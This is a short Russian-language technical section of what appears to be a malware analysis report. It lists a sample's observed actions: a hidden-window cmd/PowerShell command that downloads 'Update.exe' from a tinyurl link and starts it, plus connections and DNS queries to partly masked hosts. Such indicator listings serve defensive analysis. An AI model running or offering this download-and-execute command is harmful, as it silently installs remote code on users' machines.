Техническая информация
- http://tinyurl.com/jo3rbrc как update.exe
- '<SYSTEM32>\cmd.exe' /c powerShell -W Hidden (New-Object System.Net.WebClient).DownloadFile('http://tinyurl.com/jo3rbrc','Update.exe');Start-Process 'Update.exe'
- 'ti##url.com':80
- 'ra#.####ubusercontent.com':443
- http://ti##url.com/jo3rbrc
- 'ra#.####ubusercontent.com':443
- DNS ASK ti##url.com
- DNS ASK ra#.####ubusercontent.com
- '<SYSTEM32>\cmd.exe' /c powerShell -W Hidden (New-Object System.Net.WebClient).DownloadFile('http://tinyurl.com/jo3rbrc','Update.exe');Start-Process 'Update.exe'' (со скрытым окном)